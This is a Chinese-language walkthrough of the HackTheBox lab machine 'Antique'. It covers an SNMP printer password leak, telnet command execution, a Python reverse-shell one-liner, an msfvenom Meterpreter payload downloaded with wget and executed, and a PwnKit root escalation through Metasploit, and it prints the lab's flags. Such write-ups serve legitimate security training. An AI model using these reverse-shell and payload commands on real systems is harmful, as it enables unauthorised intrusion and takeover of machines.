HTB:Antique[WriteUP]

目录

连接至HTB服务器并启动靶机

1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?

2.What service is running on the UDP port that we identified in the previous question?

3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?

4.What is the password for the HJ JetDirect Telnet service?

通过searchsploit工具对该关键词进行搜索

5.After we successfuly authenticate with the Telnet service, which command can we use to execute system commands?

6.Submit the flag located on the lp user's desktop.

USER_FLAG:4c78d4500a5c9f6281d7c3d9dd3ad3c8

7.The box is has a service listening on the 127.0.0.1 interface. What TCP port is it?

8.What version of CUPS is running on port 631?

9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?

10.Submit the flag located in root's home directory.

将Meterpreter收回会话

ROOT_FLAG:5821059e12bbea7d6e680222d31cdd65


连接至HTB服务器并启动靶机

靶机IP:10.10.11.107

分配IP:10.10.16.22


1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?

使用nmap对靶机进行TCP、UDP端口扫描

nmap -p- --min-rate=1500 -T4 -sS -sU -Pn {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p- --min-rate=1500 -T4 -sS -sU -Pn 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 08:05 EDT
Warning: 10.10.11.107 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.107
Host is up (0.075s latency).
Not shown: 65534 closed tcp ports (reset), 307 closed udp ports (port-unreach), 65227 open|filtered udp ports (no-response)
PORT    STATE SERVICE
23/tcp  open  telnet
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 347.51 seconds

由扫描结果可见,靶机开放UDP端口:161


2.What service is running on the UDP port that we identified in the previous question?

使用nmap对靶机161端口进行脚本、服务信息扫描

nmap -p 161 -sU -sCV {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 161 -sU -sCV 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 09:12 EDT
Nmap scan report for 10.10.11.107
Host is up (0.079s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

由扫描结果可见,SERVICE栏目下显示161端口运行的服务为:snmp


3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?

使用snmpwalk枚举靶机SNMP服务

snmpwalk -v 1 -c public {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# snmpwalk -v 1 -c public 10.10.11.107
iso.3.6.1.2.1 = STRING: "HTB Printer"

回显HTB Printer,尝试连接靶机Telnet服务

telnet {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password: root
Invalid password
Connection closed by foreign host.

尝试空密码无法进入,通过回显可见字符串:HP JetDirect


4.What is the password for the HJ JetDirect Telnet service?

通过searchsploit工具对该关键词进行搜索

searchsploit SNMP | grep 'JetDirect'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit SNMP | grep 'JetDirect'
HP JetDirect Printer - SNMP JetAdmin Device Passw | hardware/remote/22319.txt

将该漏洞PoC复制到当前目录下

searchsploit -m 22319.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 22319.txt
  Exploit: HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure
      URL: https://www.exploit-db.com/exploits/22319
     Path: /usr/share/exploitdb/exploits/hardware/remote/22319.txt
    Codes: CVE-2002-1048, OSVDB-2079
 Verified: True
File Type: ASCII text, with very long lines (323)
Copied to: /home/kali/Desktop/temp/22319.txt

查看该PoC内容

cat 22319.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 22319.txt                                                             
HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3113A/J3263A/300.0 X Printer SNMP JetAdmin Device Password Disclosure Vulnerability

source: https://www.securityfocus.com/bid/7001/info

A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer.

It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer.

C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0

国产化后

HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3263A/300.0 X打印机SNMP JetAdmin设备密码泄露漏洞

来源:https://www.securityfocus.com/bid/7001/info

JetDirect打印机的问题可能会使远程用户获得对打印机的管理访问权限。

据报道,HP JetDirect打印机在某些情况下会泄露web JetAdmin设备密码。通过向易受攻击的打印机发送SNMP GET请求,打印机将向请求者返回十六进制编码的设备密码。这可以允许远程用户访问和更改打印机的配置。

C: \>直到将example.printer公开。1.3.6.1.4.1.11.2.3.9.1.1.13.0

利用payload枚举靶机SNMP服务密码:1.3.6.1.4.1.11.2.3.9.1.1.13.0

snmpwalk -v 1 -c public {TARGET_IP} .1.3.6.1.4.1.11.2.3.9.1.1.13.0

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# snmpwalk -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

获得一串密文,尝试将其中的空格都删除

504073737730726440313233212131323313917181922232526273031333435373839424349505154575861657475798283869091949598103106111114115119122123126130131134135

再通过十六进制转ASCII进行解码

P@ssw0rd@123!!123q"2Rbs3CSs$4EuWGW(8i    IYaA"1&1A5

截取相关凭证信息,密码为:P@ssw0rd@123!!123


5.After we successfuly authenticate with the Telnet service, which command can we use to execute system commands?

使用上文获取的密码登录靶机Telnet服务

telnet {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password: P@ssw0rd@123!!123

登录成功后,回显提示我们输入"?"查看帮助

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

由回显可见,执行系统命令的命令为:exec


6.Submit the flag located on the lp user's desktop.

尝试利用python获得反弹shell

exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{NATIVE_IP}",{NATIVE_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.107] 48948
/bin/sh: 0: can't access tty; job control turned off
$ whoami
lp

提升tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

查看user_flag内容

cat user.txt

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ ls
ls
telnet.py  user.txt
lp@antique:~$ cat user.txt
cat user.txt
4c78d4500a5c9f6281d7c3d9dd3ad3c8

USER_FLAG:4c78d4500a5c9f6281d7c3d9dd3ad3c8


7.The box is has a service listening on the 127.0.0.1 interface. What TCP port is it?

查看当前网络连接

ss -tan

由回显可见,在本地(127.0.0.1)有服务运行在端口:631


8.What version of CUPS is running on port 631?

通过curl命令查看631端口托管服务的相信息

curl 127.0.0.1:631

lp@antique:~$ curl 127.0.0.1:631
curl 127.0.0.1:631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <TITLE>Home - CUPS 1.6.1</TITLE>
        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
        <LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/">&nbsp;&nbsp;Home&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/admin">&nbsp;&nbsp;Administration&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/classes/">&nbsp;&nbsp;Classes&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/help/">&nbsp;&nbsp;Online&nbsp;Help&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/jobs/">&nbsp;&nbsp;Jobs&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/printers/">&nbsp;&nbsp;Printers&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE>

<TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;">

<H1>CUPS 1.6.1</H1>

<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>&reg;</SUP> X and
other UNIX<SUP>&reg;</SUP>-like operating systems.</P>

</TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE>

<TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;">

<H2>CUPS for Users</H2>

<P><A HREF="help/overview.html">Overview of CUPS</A></P>

<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>

<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>

<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>

</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">

<H2>CUPS for Administrators</H2>

<P><A HREF="admin">Adding Printers and Classes</A></P>

<P><A HREF="help/policies.html">Managing Operation Policies</A></P>

<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>

<P><A HREF="help/security.html">Server Security</A></P>

<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>

<P><A HREF="help/network.html">Using Network Printers</A></P>

<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>

<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>

</TD><TD VALIGN="top" STYLE="padding-left: 20px;">

<H2>CUPS for Developers</H2>

<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>

<P><A HREF="help/api-cups.html">CUPS API</A></P>

<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>

<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>

<P><A HREF="help/api-ppd.html">PPD API</A></P>

<P><A HREF="help/api-raster.html">Raster API</A></P>

<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>

<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>

</TD></TR>
</TABLE>

</TD></TR>
<TR><TD>&nbsp;</TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>

由回显中<TITLE>元素可见,该端口托管服务CUPS版本为:1.6.1


9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?

启动Metasploit

msfconsole

搜索CUPS 1.6.1

search CUPS 1.6.1

使用该模块

use post/multi/escalate/cups_root_file_read

展示该模块信息

info

msf6 post(multi/escalate/cups_root_file_read) > info

       Name: CUPS 1.6.1 Root File Read
     Module: post/multi/escalate/cups_root_file_read
   Platform: Linux, OSX
       Arch:
       Rank: Normal
  Disclosed: 2012-11-20

Provided by:
  Jann Horn
  joev <joev@metasploit.com>

Compatible session types:

Basic options:
  Name       Current Setting          Required  Description
  ----       ---------------          --------  -----------
  ERROR_LOG  /var/log/cups/error_log  yes       The original path to the CUPS error log
  FILE       /etc/shadow              yes       The file to steal.
  SESSION                             yes       The session to run this module on

Description:
  This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
  CUPS allows members of the lpadmin group to make changes to the cupsd.conf
  configuration, which can specify an Error Log path. When the user visits the
  Error Log page in the web interface, the cupsd daemon (running with setuid root)
  reads the Error Log path and echoes it as plaintext.

  This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
  as long as the session is in the lpadmin group.

  Warning: if the user has set up a custom path to the CUPS error log,
  this module might fail to reset that path correctly. You can specify
  a custom error log path with the ERROR_LOG datastore option.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-5519
  OSVDB (87635)
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791


View the full module info with the info -d command.

由展示信息可见,该模块基于漏洞:CVE-2012-5519


10.Submit the flag located in root's home directory.

查看靶机系统信息

查看系统类型以及系统位数

uname
uname -m

lp@antique:~$ uname
uname
Linux
lp@antique:~$ uname -m
uname -m
x86_64

通过获得的系统信息,生成相对于的Meterpreter马子

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={NATIVE_IP} LPORT=1234 -f elf > shell.elf

┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.22 LPORT=1234 -f elf > shell.elf     
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes

通过python开启一个http服务将马子上传至靶机

python -m http.server 7777

靶机通过wget命令下载马子

wget http://{NATIVE_IP}:7777/shell.elf -O shell.elf

lp@antique:~$ wget http://10.10.16.22:7777/shell.elf -O shell.elf
wget http://10.10.16.22:7777/shell.elf -O shell.elf
--2024-10-24 04:52:16--  http://10.10.16.22:7777/shell.elf
Connecting to 10.10.16.22:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: ‘shell.elf’

shell.elf           100%[===================>]     250  --.-KB/s    in 0s      

2024-10-24 04:52:17 (33.7 MB/s) - ‘shell.elf’ saved [250/250]

在MSF中切换到监听模块:exploit/multi/handler

use exploit/multi/handler

配置好参数:LHOST、LPORT、PAYLOAD

msf6 exploit(multi/handler) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

输入exploit、run开始监听,靶机执行运行shell.elf文件

lp@antique:~$ chmod +x shell.elf
chmod +x shell.elf
lp@antique:~$ ./shell.elf
./shell.elf

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.22:1234
[*] Sending stage (3045380 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.16.22:1234 -> 10.10.11.107:50326) at 2024-10-24

将Meterpreter收回会话

background

meterpreter > background
[*] Backgrounding session 2...

切换到提权模块(post/multi/recon/local_exploit_suggester)进行扫描

use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.107 - Collecting local exploits for x64/linux...
[*] 10.10.11.107 - 198 exploit checks are being tried...
[+] 10.10.11.107 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_1043_io_uring_priv_esc: The target is vulnerable. > 1 CPU required, detected: 2
[+] 10.10.11.107 - exploit/linux/local/cve_2023_0386_overlayfs_priv_esc: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/netfilter_nft_set_elem_init_privesc: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.11.107 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/sudo_baron_samedit: The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[+] 10.10.11.107 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1.2 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 70 / 70
[*] 10.10.11.107 - Valid modules for session 2:

这里直接尝试第一个可利用模块:exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

需要配置参数:LHOST、LPORT、SESSION、PAYLOAD

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 7878
LPORT => 7878
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp

输入run、exploit开始漏洞利用

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit

[*] Started reverse TCP handler on 10.10.16.22:7878
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ybwjexbl
[+] The target is vulnerable.
[*] Writing '/tmp/.sflzlca/fwxcodr/fwxcodr.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.sflzlca
[*] Sending stage (3045380 bytes) to 10.10.11.107
[+] Deleted /tmp/.sflzlca/fwxcodr/fwxcodr.so
[+] Deleted /tmp/.sflzlca/.arusgsxpspiz
[+] Deleted /tmp/.sflzlca
[*] Meterpreter session 3 opened (10.10.16.22:7878 -> 10.10.11.107:58106) at 2024-10-24 01:15:40 -0400

meterpreter > getuid
Server username: root

可以看到顺利拿到了root权限


切换到终端

shell

提升TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

查找root_flag位置

find / -name 'root.txt'

查看root_flag内容

cat /root/root.txt

meterpreter > shell
Process 1982 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@antique:/# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@antique:/# cat /root/root.txt
cat /root/root.txt
5821059e12bbea7d6e680222d31cdd65

ROOT_FLAG:5821059e12bbea7d6e680222d31cdd65

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/57633.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Next.js14快速上手

文章目录 ***客户端***什么是Next项目在线地址官方文档项目创建查看项目目录结构app属于根目录 ***服务端***vercel数据库prisma 客户端 什么是Next Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。您可以使用 React Components 来构建用户界面&#xff0c;并使用 Ne…

java实现日志按天打印

<?xml version"1.0" encoding"UTF-8"?> <configuration><!-- 应用名称&#xff1a;和统一配置中的项目代码保持一致&#xff08;小写&#xff09; --><property name"APP_NAME" value"mita-main"/><!--日…

AudioSetCaps数据集:包含190万对来自AudioSet录音的音频-字幕对。

2024-10-21&#xff0c;由西北工业大学、西安联丰声学技术有限公司、南洋理工大学、萨里大学和中国科学院声学研究所创建了AudioSetCaps数据集&#xff0c;包含190万对来自AudioSet录音的音频-字幕对。这个数据集在音频-文本检索和自动音频字幕两项下游任务上展现了卓越的性能&…

百度翻译以及另外三款翻译工具推荐!!!

在这个全球化的时代&#xff0c;翻译工具已经成为我们生活中不可或缺的一部分。我们需要使用翻译工具来克服语言障碍&#xff0c;无论是出国旅行、商务谈判还是学术研究。那么&#xff0c;市场上有各种各样的翻译工具。有哪些好用的在线翻译软件呢&#xff1f;别担心&#xff0…

系统架构设计师教程 第2章 2.1-2计算机系统及硬件 笔记

2.1计算机系统概述 ★☆☆☆☆ 计算机系统 (Computer System) 是指用于数据管理的计算机硬件、软件及网络组成的系统。 一般指由硬件子系统和软件子系统组成的系统&#xff0c;简称为计算机。 将连接多个计算机以实现计算机间数据交换能力的网络设备&#xff0c;称为计算机网…

LabVIEW提高开发效率技巧----节省内存

在LabVIEW开发过程中&#xff0c;内存管理是保障程序稳定性和性能的关键。本文将详细介绍如何通过队列处理来节省内存&#xff0c;尤其是如何通过解耦释放不再需要的数据&#xff0c;防止内存泄漏。通过多个实际例子&#xff0c;从不同角度探讨队列处理在大数据量或长时间运行的…

HTB:CozyHosting[WriteUP]

目录 连接至HTB服务器并启动靶机 1.How many TCP ports are open on CozyHosting? 2.The webserver on TCP port 80 issues a redirect to what domain? 3.What relative path on the webserver returns a 500 error? 4.What is the Java web framework used in the we…

初识算法 · 二分查找(4)

目录 前言&#xff1a; 寻找峰值 题目解析 算法原理 算法编写 寻找旋转排序数组中的最小值 题目解析 算法原理 算法编写 寻找缺失的数字 题目解析 算法原理 算法编写 前言&#xff1a; ​本文的主题是二分查找&#xff0c;通过三道题目讲解&#xff0c;一道是寻找…

【Web开发】什么是Nuxt? 利用Nuxt快速搭建前端项目

Nuxt官网&#xff1a;https://nuxt.com/ 启动一个Nuxt项目 在vscode的项目文件终端运行以下命令&#xff1a; npx nuxilatest init <my-app>npm installnpm run dev然后就启动了一个Nuxt项目 安装Nuxt UI Nuxt UI官网&#xff1a;https://ui.nuxt.com/ npx nuxilates…

线程的同步

目录 引入 认识条件变量 快速认识接口​编辑 认识条件变量​编辑 测试代码​编辑 生产消费模型 为何要使用生产者消费者模型 理解 编写生产消费模型 BlockingQueue 单生产单消费 多生产多消费 引入 同步&#xff1a;在保证数据安全的前提下&#xff0c;让线程…

Hugging Face HUGS 加快了基于开放模型的AI应用的开发

在过去一年左右的时间里&#xff0c;开源人工智能模型在性能上已经明显赶上了 OpenAI、Google 和其他公司的流行闭源模型。 然而&#xff0c;由于在不同硬件上部署和维护这些模型所带来的开销&#xff0c;开发人员尚未广泛采用这些模型。为了解决这个问题&#xff0c;Hugging F…

【Unity】Unity中文本中插入超链接且可点击响应,TextMeshPro的进阶用法

一、需求和尝试 今天遇到这样一个需求&#xff1a;在文本中插入超链接&#xff0c;且这个链接可以点击跳转对应的url&#xff0c;具体形式如下图所示。 其实这个有一个简单粗暴的方法&#xff0c;就是把需要加超链接的文本单独拿出来&#xff0c;和其他文本进行拼接&#xf…

修改huggingface的缓存目录以及镜像源

执行以下语句查看当前配置 huggingface-cli env默认输出应该如下 (py39-transformers) PS D:\py_project\transformers_demo> huggingface-cli envCopy-and-paste the text below in your GitHub issue.- huggingface_hub version: 0.26.1 - Platform: Windows-10-10.0.22…

面向垂类场景的智能化低代码引擎

背景介绍 在通信领域中&#xff0c;不同客户的数字化场景存在多种个性化大屏的定制需求&#xff0c;常见业务范围涵盖政务、金融、教育、工业、传媒、互联网等行业领域。然而&#xff0c;面对如此巨大的产业痛点诉求&#xff0c;传统低代码领域却存在数据监控粒度不统一、定制化…

学习docker第三弹------Docker镜像以及推送拉取镜像到阿里云公有仓库和私有仓库

docker目录 1 Docker镜像dockers镜像的进一步理解 2 Docker镜像commit操作实例案例内容是ubuntu安装vim 3 将本地镜像推送至阿里云4 将阿里云镜像下载到本地仓库5 后记 1 Docker镜像 镜像&#xff0c;是docker的三件套之一&#xff08;镜像、容器、仓库&#xff09;&#xff0…

基于SpringBoot+Vue+MySQL的实践性教学系统

系统展示 用户前台界面 后台界面 系统背景 随着信息技术的快速发展&#xff0c;企业对于高效、智能的管理系统需求日益迫切。传统的管理系统大多采用单机版或C/S架构&#xff0c;存在操作复杂、维护困难、数据共享性差等问题。而基于SpringBootVueMySQL的全栈管理系统&#xff…

【10分钟本地部署大语言模型】借助1Panel、MaxKb、Ollama快速部署大语言模型(qwen、llama等)及知识库

前言&#xff1a; 本文介绍一种快速在Linux服务器&#xff08;windows使用wsl也可以&#xff09;上部署大语言模型&#xff08;含知识库&#xff09;的方式。 核心内容如下&#xff1a; 1Panel&#xff1a; 开源的Linux 服务器运维管理面板&#xff0c;通过该面板安装ollama和…

Serv00 免费虚拟主机 零成本搭建 PHP / Node.js 网站

本文首发于只抄博客&#xff0c;欢迎点击原文链接了解更多内容。 前言 Serv00 是一个提供免费虚拟主机的平台&#xff0c;包含了 3GB 的存储空间和 512MB 的内存空间&#xff0c;足够我们搭建一个 1IP 的小网站了。同时他还不限制每月的流量&#xff0c;并提供了 16 个数据库&…

进程间通信(一)管道

文章目录 进程间通信进程间通信概述进程间通信的方式管道通信示例--基于管道的父子进程通信示例--使用管道进程兄弟进程通信 管道的读写特性示例--不完整管道&#xff08;读一个写端关闭的管道&#xff09;示例--不完整管道&#xff08;写一个读端关闭的管道&#xff09; 标准库…

PyQt 入门教程(3)基础知识 | 3.1、使用QtDesigner创建.ui文件

文章目录 一、使用QtDesigner创建.ui文件1、创建.ui文件2、生成.py文件3、使用新生成的.py文件4、编辑新生成的.py文件 一、使用QtDesigner创建.ui文件 1、创建.ui文件 打开PyCharm&#xff0c;使用自定义外部工具QtDesigner创建mydialog.ui文件&#xff0c;如下&#xff1a; …